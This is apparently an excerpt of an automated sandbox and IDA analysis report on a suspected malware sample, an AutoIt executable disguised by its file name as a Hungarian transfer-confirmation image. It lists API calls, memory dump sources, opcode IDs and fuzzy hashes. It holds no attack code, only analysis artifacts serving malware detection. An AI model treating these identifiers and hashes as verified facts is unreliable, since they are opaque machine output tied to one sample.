                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                          APIs
                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message_doexit
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D